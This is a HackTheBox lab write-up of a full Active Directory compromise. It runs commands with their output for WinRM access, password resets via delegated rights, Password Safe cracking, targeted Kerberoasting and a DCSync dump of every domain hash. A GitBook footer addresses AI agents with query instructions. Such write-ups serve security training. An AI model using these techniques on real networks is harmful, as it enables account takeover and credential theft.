> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-administrator.md).

# HTB - Administrator

## NMAP

```bash
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-30 18:40:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
```

We are given the below credentials to start the machine.

`Username: Olivia`

`Password: ichliebedich`

### SMB

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUTZmz5A0cXvvqPjzJ7II%2Fimage.png?alt=media&amp;token=a7577acb-6fb6-43de-96f3-86e3bcd9a531" alt=""><figcaption></figcaption></figure>

No interesting shares.

### FTP

NO anonymous access and the given credentials cannot access home directory

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6HuIbewd7Ow8KJtAfpIM%2Fimage.png?alt=media&amp;token=39e87417-31ee-4abb-bb41-b6be5f938f2d" alt=""><figcaption></figcaption></figure>

## Bloodhound

So i collected the blood data to actually understand the machine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FcuqddbiRsDe2VYxbalc7%2Fimage.png?alt=media&amp;token=e00e6c08-f7ba-4565-9c5d-6ed82e97e00c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKZ7bs7XIgoi5XSjhbG4g%2Fimage.png?alt=media&amp;token=c20cd330-0e2f-40da-8295-1b8cfbd4f547" alt=""><figcaption></figcaption></figure>

Olivia is member of remote access so we can winrm to her.

## Shell as Olivia

```
evil-winrm -u olivia -p 'ichliebedich' -i 10.129.9.21
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FetIUakAVlB1sznY90Zbb%2Fimage.png?alt=media&amp;token=ccd5e673-6bab-484a-97c2-81dd73162213" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0pB1EStI5GvgoqaNbEQv%2Fimage.png?alt=media&amp;token=2ae3cae9-430e-4ccc-a0d1-a3a1757afeb2" alt=""><figcaption></figcaption></figure>

Found emily user in the users directory.

Now back on the bloodhound i found olivia has GenericAll on Micheal

### Abusing GenericAll to change Password

Generic All is a powerful Active Directory permission (specifically a "GenericAll" access right) that essentially grants an account "Full Control" over a target object, such as a user, group, or computer. If an attacker gains this permission on an object, they can modify its attributes, reset its passwords, or manipulate group memberships, often leading to immediate privilege escalation or persistence.

```bash
──(ajay㉿kali)-[~/Downloads]
└─$ net rpc password "michael" "newP@ssword2022" -U "administrator.htb"/"Olivia"%"ichliebedich" -S 10.129.9.21

──(ajay㉿kali)-[~/Downloads]
└─$ netexec smb 10.129.9.21 -u 'michael' -p 'newP@ssword2022'
SMB         10.129.9.21     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.9.21     445    DC               [+] administrator.htb\michael:newP@ssword2022
```

Now that we changed the password of micheal we can enumerate furthur. Again on bloodhound i found micheal as ForceChangePassword on Benjamin.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FS4uKWrn32Ks4sotFjX3c%2Fimage.png?alt=media&amp;token=613335b3-ae95-444a-b967-5345ffbf9440" alt=""><figcaption></figcaption></figure>

### ForceChangePassword

With ForceChangePassword we can change the password of the target user.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fx0eD89hAqTEVAhjFrWrG%2Fimage.png?alt=media&amp;token=d87aaf59-afe7-43d9-8b8a-017e28cfd89d" alt=""><figcaption></figcaption></figure>

Enumerating furthur on bloodhound.Benjamin is part of Share Moderators which is an interesting group.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnOD94ijbt7krS5YkH8gI%2Fimage.png?alt=media&amp;token=9f25e1b4-068f-4d22-9286-6eb2af49cb02" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F60RqZ9EjM06gaReUeWJS%2Fimage.png?alt=media&amp;token=cf91d32d-f9c9-4a14-8497-789699bb2e18" alt=""><figcaption></figcaption></figure>

Enumerating the shares with netexec could not find any interesting shares. But with the credentials of Benjamin i was able to login via FTP.

## Benjamin FTP Shell Access

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfRLhG8oPubgbwBjV4gFR%2Fimage.png?alt=media&amp;token=67bb9787-00b6-4066-b361-90f92277748d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFmVcUAZpkeuCt6KrXpNi%2Fimage.png?alt=media&amp;token=0706ec85-1588-4dbe-9d77-adf04d4b8942" alt=""><figcaption></figcaption></figure>

Found Backup.psafe3.

### Craacking the Psafe3 file

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNwyLajq7iLkkbPwghPC8%2Fimage.png?alt=media&amp;token=92405ca3-cec1-45ed-857d-4dfda2db4530" alt=""><figcaption></figcaption></figure>

need the master password.

```bash
──(ajay㉿kali)-[~]
└─$ pwsafe2john Backup.psafe3 
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
```

```bash
┌──(ajay㉿kali)-[~]
└─$ pwsafe2john Backup.psafe3 > psafe3.hash
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ john psafe3.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 512/512 AVX512BW 16x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2026-05-30 15:27) 7.692g/s 63015p/s 63015c/s 63015C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpzdJi5rwVKOMwf1Cv1wW%2Fimage.png?alt=media&amp;token=b3df911c-6ed5-4af4-ac40-921e47c3139f" alt=""><figcaption></figcaption></figure>

Opening the document found three users and there passwords.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWu2ED73j8Zop7YIvLI7N%2Fimage.png?alt=media&amp;token=722f92b0-ad9d-4406-bf11-f5ccdf1e3b9b" alt=""><figcaption></figcaption></figure>

extracted the following passwords from the safe and validated aganist smb through nxc.

```bash
──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.9.21 -u users.txt -p pass.txt --continue-on-success
SMB         10.129.9.21     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.9.21     445    DC               [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE 
SMB         10.129.9.21     445    DC               [-] administrator.htb\emily:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE 
SMB         10.129.9.21     445    DC               [-] administrator.htb\emma:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE 
SMB         10.129.9.21     445    DC               [-] administrator.htb\alexander:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE 
SMB         10.129.9.21     445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb 
SMB         10.129.9.21     445    DC               [-] administrator.htb\emma:UXLCI5iETUsIBoFVTj8yQFKoHjXmb STATUS_LOGON_FAILURE 
SMB         10.129.9.21     445    DC               [-] administrator.htb\alexander:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE 
SMB         10.129.9.21     445    DC               [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE
```

`emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb`

Emily is part of Remote Management groups so we can winrm to her.

## Shell as Emily

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBmJodBGRfLimwMfCFVRG%2Fimage.png?alt=media&amp;token=f5a8f147-a970-46e6-a5ff-dc7763d7f9b0" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFSd95njRkOMrhcSIZqvv%2Fimage.png?alt=media&amp;token=f8e5bfb8-d393-4881-ab7a-4aa21de4c35d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiAhmmZzgfPHhKzwG2XTA%2Fimage.png?alt=media&amp;token=de5a35d7-d3e8-4c88-a9cf-aae905a9bfe9" alt=""><figcaption></figcaption></figure>

Bloodhound revealed that emily has GenericWrie on Ethan

### Abusing GenericWrite

GenericWrite lets Emily set an SPN on Ethan, making him Kerberoastable:

```powershell
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily
*Evil-WinRM* PS C:\Users\emily\Documents> Set-ADUser -Identity ethan -ServicePrincipalNames @{Add='fake/spn'}
*Evil-WinRM* PS C:\Users\emily\Documents>
```

Now on attack machine, we can perfrom kerberoasting uisng impacket-GetUserSPNs

```bash
┌──(ajay㉿kali)-[~]
└─$ impacket-GetUserSPNs administrator.htb/emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb -dc-ip 10.129.9.21 -request
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name   MemberOf  PasswordLastSet             LastLogon  Delegation 
--------------------  -----  --------  --------------------------  ---------  ----------
fake/spn              ethan            2024-10-12 16:52:14.117811  <never>               



[-] CCache file is not found. Skipping...
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$f2d68bae675d270ece7502dea2ddb466$68e4f63714babba895711fd1f771472d556129ef55d40974b9677ecb8026b36e8562429d16c407c969e561b6b3c1ebad2227e9ba0560e1d433e3f4c7af6a2645e756a46155baa6c9ec5e8d07f487d88657c0ca63779e3da96d721bb05dd83822ac5f323a7108e526b21b3e8d60d57f07d3a5689ef9198f624e3a5debd850f7f684d1580504b46bfe1b8147b98cbd5161abf46958b7b18e7ee1de0231a046829e0f45fed14f245f202b2b437fbd3ef8e2e96d0f4f6ce41acc6779d912e9552d19d9e4b86b24e00118e3e73cca8110ae7f7a228b410fdb845f74cb63e98e3da2094a0e139cf4ad581690af763a0c1a3c1b0583c1da11e9aee7aaf96c2bce7382f20249426f7422bbb6ed92dde593fb403a4ae3bfda98faa7b38d27de38fba979633dd5f20bab12f1819c8f3a358742e36bf06820fc7f0917d6f09e06d615f1a7b9730028022c5b524427019450953770b79e01ff3eb67303563cdbd568243aa3da94d667511513712f58d54c047be6527829d96fa72cacb1464244bac1b3f9782eab04ce5f23879c4899f26d8f4bd38dee07748bc2737640dacc4baecca0252efadea28313726fa5a50349aeb00259347ac3cac68e7dd2e69ba1e833c6bc28f0cc82d05d85a4df3c9e61edaa8e86eb86785d895c7bc66d4d60eef7357ee9f8279b59adfbb91490194c5503398ebab5f3fda89505a7ec45bc9afdc8ef7f39e3bf4040e13fa4042eaec5e101047c732d53345fe1a47a23108a4ca62c71f738883b3bdd054f8882b15630da2a75e14df71ae465b82a9abda91fab20f58127b16789214264504570ee74e6ed2cf58d5932a6754eff1298b587aec1560b1a17312033465e2895d77512dd1bd70008f110ab6baf73233147979a98d8a075e8e99167a2680b36380d505156cd956a4093799d8b4e431601c4eb40d2cc95dccf139b277f49b806dddfb05124f39202b625c5b7c65460b531c4feaac1e3ca81ced7ef10dbe2078610b8579045d7971e7cf803b5051e2c5cb39f680528e2486fe1879cc55afeccdc1a347a52f1dc89570db29e5d995d301053e3a9cefb43607323fca90fe5d8b80155bb019841b8d01afea313d2ebac670b3e18d5e67adebb9539132b31adcb32a49f94c8279b10fdd4568d6bcc1e0852855a2159142a5df1ade5a0e3721fd5395a48479c89630120dc2e09d6d703a93e3996b89938df299b6dd57618b1641cc15d6ff99980965e202a0df410a173807c73bb51d90928792c467888fe6705731938353034933a9a13e944e676d6a7a804b717dd9b0dcd105f77a8b56bee6dd6dc9413e3e8c8f87773cbc583aa382adb3d17040329cd0b2c83b72e2ad5a1bd7784abe2d29206404038ab7accd8fc7620c86aa4bbc7a1d1e4664dba6574c9d127fc20aaacaf442461e180946bc6dd08204d771527b05a17fa22b0d39ebd6996eef2778ffdbf973e4379210fde4e9190485a4e0168e8bc6216dd26426474bf0dc4cda50331c3cc5f46cd20661e9b5b326d7e56baebe452471f8f89b576a75293
```

```bash
┌──(ajay㉿kali)-[~]
└─$ hashcat -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt                                                 
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-11th Gen Intel(R) Core(TM) i5-11320H @ 3.20GHz, 1456/2912 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$f2d68bae675d270ece7502dea2ddb466$68e4f63714babba895711fd1f771472d556129ef55d40974b9677ecb8026b36e8562429d16c407c969e561b6b3c1ebad2227e9ba0560e1d433e3f4c7af6a2645e756a46155baa6c9ec5e8d07f487d88657c0ca63779e3da96d721bb05dd83822ac5f323a7108e526b21b3e8d60d57f07d3a5689ef9198f624e3a5debd850f7f684d1580504b46bfe1b8147b98cbd5161abf46958b7b18e7ee1de0231a046829e0f45fed14f245f202b2b437fbd3ef8e2e96d0f4f6ce41acc6779d912e9552d19d9e4b86b24e00118e3e73cca8110ae7f7a228b410fdb845f74cb63e98e3da2094a0e139cf4ad581690af763a0c1a3c1b0583c1da11e9aee7aaf96c2bce7382f20249426f7422bbb6ed92dde593fb403a4ae3bfda98faa7b38d27de38fba979633dd5f20bab12f1819c8f3a358742e36bf06820fc7f0917d6f09e06d615f1a7b9730028022c5b524427019450953770b79e01ff3eb67303563cdbd568243aa3da94d667511513712f58d54c047be6527829d96fa72cacb1464244bac1b3f9782eab04ce5f23879c4899f26d8f4bd38dee07748bc2737640dacc4baecca0252efadea28313726fa5a50349aeb00259347ac3cac68e7dd2e69ba1e833c6bc28f0cc82d05d85a4df3c9e61edaa8e86eb86785d895c7bc66d4d60eef7357ee9f8279b59adfbb91490194c5503398ebab5f3fda89505a7ec45bc9afdc8ef7f39e3bf4040e13fa4042eaec5e101047c732d53345fe1a47a23108a4ca62c71f738883b3bdd054f8882b15630da2a75e14df71ae465b82a9abda91fab20f58127b16789214264504570ee74e6ed2cf58d5932a6754eff1298b587aec1560b1a17312033465e2895d77512dd1bd70008f110ab6baf73233147979a98d8a075e8e99167a2680b36380d505156cd956a4093799d8b4e431601c4eb40d2cc95dccf139b277f49b806dddfb05124f39202b625c5b7c65460b531c4feaac1e3ca81ced7ef10dbe2078610b8579045d7971e7cf803b5051e2c5cb39f680528e2486fe1879cc55afeccdc1a347a52f1dc89570db29e5d995d301053e3a9cefb43607323fca90fe5d8b80155bb019841b8d01afea313d2ebac670b3e18d5e67adebb9539132b31adcb32a49f94c8279b10fdd4568d6bcc1e0852855a2159142a5df1ade5a0e3721fd5395a48479c89630120dc2e09d6d703a93e3996b89938df299b6dd57618b1641cc15d6ff99980965e202a0df410a173807c73bb51d90928792c467888fe6705731938353034933a9a13e944e676d6a7a804b717dd9b0dcd105f77a8b56bee6dd6dc9413e3e8c8f87773cbc583aa382adb3d17040329cd0b2c83b72e2ad5a1bd7784abe2d29206404038ab7accd8fc7620c86aa4bbc7a1d1e4664dba6574c9d127fc20aaacaf442461e180946bc6dd08204d771527b05a17fa22b0d39ebd6996eef2778ffdbf973e4379210fde4e9190485a4e0168e8bc6216dd26426474bf0dc4cda50331c3cc5f46cd20661e9b5b326d7e56baebe452471f8f89b576a75293:limpbizkit
```

`ethan : limpbizkit`

Examing the permissions of ethan on bloodhound revealed that Ethan as DCsync on administrator.htb

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fskmjy4iPMSqhYoYHMn81%2Fimage.png?alt=media&amp;token=112c5118-8409-4d06-b52b-83811be64261" alt=""><figcaption></figcaption></figure>

### DCSync as Ethan

Ethan dont have permissions to remote access but can be able perform DCSync on the Administrator.htb as the permissions GetChangesAll and GetChanges indicate DCSync.

DCSync is a sophisticated technique that simulates the behavior of a Domain Controller by using the `GetNCChanges` replication service. If an attacker possesses an account with sufficient privileges (typically having "Replicating Directory Changes" permissions), they can request sensitive data directly from the Domain Controller. This allows them to extract the password hashes of any user in the domain—including the KRBTGT account or high-privileged administrators—without needing to touch the target servers themselves, making it a primary method for achieving full domain dominance.

```bash
┌──(ajay㉿kali)-[~]
└─$ impacket-secretsdump administrator.htb/ethan:limpbizkit@10.129.9.21
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:fb54d1c05e301e024800c6ad99fe9b45:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:fb54d1c05e301e024800c6ad99fe9b45:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:74c2d8511451c3ed7f148b6c9784b8f932cc9171b8bef9f8191a876fbd201688
administrator.htb\michael:aes128-cts-hmac-sha1-96:9c0a18a5505ac0b31e750e58510830db
administrator.htb\michael:des-cbc-md5:576d3704ea57eff1
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:debcfa9696a54eecc68ec3059bd1e382adf8056d3d373b5636817cde36d340e7
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:e07a6bebd5577429690961f33f0d537a
administrator.htb\benjamin:des-cbc-md5:cdc454c4adab5452
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
```

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMY5s24qIlASeYRjwcJqx%2Fimage.png?alt=media&amp;token=125cd143-50b2-4a83-bbf2-8be51fdad7b9" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-administrator.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
